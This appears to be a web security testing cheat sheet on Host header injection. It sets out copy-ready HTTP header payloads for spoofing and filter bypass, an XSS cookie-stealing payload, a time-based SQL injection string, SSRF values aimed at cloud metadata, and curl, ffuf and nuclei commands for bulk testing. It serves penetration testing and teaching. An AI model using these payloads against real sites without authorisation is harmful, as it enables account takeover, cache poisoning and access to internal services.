Host Header Injection Guide

Comprehensive guide to Host header manipulation techniques, from basic spoofing to advanced SSRF and DNS rebinding attacks.

17+ Techniques7 ToolsCopy Ready

Host Header Injection

Host header injection testing for cache poisoning, password reset poisoning, and routing bypass.

Last updated: 2026-05-15

Phase 0

Vulnerability Description

1What is Host Header Injection?

Host Header Injection = web vulnerability when app trusts Host header without validation

2Core mechanism of the attack

Attacker modifies Host header to make server believe it is handling a different domain

3Primary impacts

Impacts: Cache Poisoning, Password Reset Poisoning, Open Redirects, Bypass security controls

4Most critical impact

Severe cases: Full Account Takeover

Phase 1

Common 1: Spoofing with Malicious Domain (Most Common)

1Purpose: Make the application generate links pointing to the attacker's server

GET /reset-password HTTP/1.1
Host: attacker.com

Phase 2

Common 2: Adding a Prefix

1Purpose: Bypass filters that only check for the main domain

GET /admin.php HTTP/1.1
Host: attackertarget.com

Phase 3

Common 3: Absolute URL in Host

1Purpose: Trick URL generation and parsing logic

GET /admin.php HTTP/1.1
Host: https://target.com/admin.php

Phase 4

Common 4: Subdomain Bypass

1Purpose: Bypass simple validation that looks only for the main domain

GET /admin.php HTTP/1.1
Host: subdomain.target.com

Phase 5

Common 5: Leading Space / Tab

1Purpose: Exploit parsing inconsistencies in servers or proxies

GET /admin.php HTTP/1.1
 Host: target.com

Phase 6

Common 6: Different Port

1Purpose: Bypass port-based access controls

GET /admin.php HTTP/1.1
Host: target.com:8080

Phase 7

Common 7: X-Forwarded-Host (Very Important)

1Purpose: Many apps/proxies trust X-Forwarded-Host over Host header

GET /admin.php HTTP/1.1
X-Forwarded-Host: attacker.com

Phase 8

Common 8: Blank Host Header

1Purpose: Some servers default to first virtual host when Host is empty

GET /admin.php HTTP/1.1
Host:

Phase 9

Common 9: Multiple Host Headers

1Purpose: Exploit inconsistencies between frontend/backend parsing

GET /admin.php HTTP/1.1
Host: target.com
Host: attacker.com

Phase 10

Quick Recon

Phase 11

Common 10: Using Server IP

1Purpose: Bypass virtual host routing or access controls using IP

GET /admin.php HTTP/1.1
Host: 192.0.2.1

Advanced 12

Advanced 1: Special Characters & Null Byte

1Purpose: Bypass filters using null bytes or special characters

Host: target.com%00.attacker.com

Advanced 13

Advanced 2: Path Traversal in Host

1Purpose: Exploit misconfigured apps that parse host as part of path

Host: ../../attacker.com

Advanced 14

Advanced 3: Encoded Host

1Purpose: Bypass validation using URL-encoded values

Host: %74%61%72%67%65%74.com

Advanced 15

Advanced 4: XSS via X-Forwarded-Host

1Purpose: Inject XSS payload via X-Forwarded-Host header

X-Forwarded-Host: evil.com"><img src=x onerror=prompt(document.cookie)>

Advanced 16

Advanced 5: SQL Injection via X-Forwarded-Host

1Purpose: Inject SQL payload via X-Forwarded-Host header

X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

Advanced 17

Advanced 6: SSRF via Host Header

1Purpose: Reach internal services via Host header manipulation

Host: internal-service.local

2Use case: SSRF to cloud metadata services

Target internal AWS metadata: Host: 169.254.169.254

Phase 18

Tool 1: cURL (Best for Manual Testing)

1#1 Test Host header injection manually

curl -I -H "Host: attacker.com" https://target.com

2#2 Test X-Forwarded-Host injection manually

curl -I -H "X-Forwarded-Host: attacker.com" https://target.com

Phase 19

Tool 2: Ffuf (Brute Force Domains)

1Fuzz Host header values with wordlist, match 200 status

ffuf -u https://target.com -H "Host: FUZZ" -w hosts.txt -mc 200

Phase 20

Tool 3: Nuclei (Automated Scanning)

1Fast automated vulnerability scanning with Nuclei templates

nuclei -u https://target.com -t x-forwarded.yaml

2CoffinXP Nuclei template for X-Forwarded-Host testing

https://github.com/coffinxp/nuclei-templates/blob/main/x-forwarded.yaml

Phase 21

Tool 4: Gau + Curl (Bulk Testing)

1Test multiple domains with custom Host header in bulk

cat domains.txt | while read url; do echo "[*] Testing $url"; curl -sk -H "Host: attacker.com" "$url" -I; done

Impact 22

Real-World Impact

1Attackers poison shared cache to serve malicious content to all users

#1: Cache Poisoning → Affects all users

2Victim receives password reset link pointing to attacker's server

#2: Password Reset Poisoning → Account theft

3Abuse Host header to redirect users to phishing sites

#3: Open Redirects

4Access admin panels or internal APIs via Host header manipulation

#4: Bypassing IP/Host-based Access Controls

5Chain with SSRF to reach internal metadata services or APIs

#5: SSRF to internal services

6Via header injection leading to injection vulnerabilities

#6: XSS & SQLi in some cases

Phase 23

Vulnerability Types Classification

1Entry level - Start here

Type: Basic Spoofing | Main Usage: Changing links & emails | Difficulty: Easy

2Intermediate - When basic methods blocked

Type: Filter Bypass | Main Usage: Null byte, Encoding, Prefix | Difficulty: Medium

3Intermediate - Exploit parsing inconsistencies

Type: Header Smuggling | Main Usage: Multiple Host, Leading Space | Difficulty: Medium

4Expert level - Chain multiple techniques

Type: Advanced Attacks | Main Usage: SSRF, XSS, SQLi, DNS Rebinding | Difficulty: Advanced

Phase 24

Practical Tip

1Step 1: Basic testing with common attacker domain

Always start with Host and X-Forwarded-Host using attacker.com

2Step 2: Apply filter evasion techniques when basic methods fail

If blocked, try bypass techniques (Null Byte, Encoding, Multiple Headers)

Tools

Tools & Resources

cURL

Best tool for manual Host header injection testing

Ffuf

Fast web fuzzer for brute-forcing Host header values

Nuclei Templates

CoffinXP Nuclei template for X-Forwarded-Host testing

Burp Suite

Professional web security testing with Host Header Injection scanner

OWASP Testing Guide

Official OWASP guide for testing Host Header Injection

Host Header Injection Guide

Comprehensive guide to Host header manipulation techniques, from basic spoofing to advanced SSRF and DNS rebinding attacks.

17+ Techniques7 ToolsCopy Ready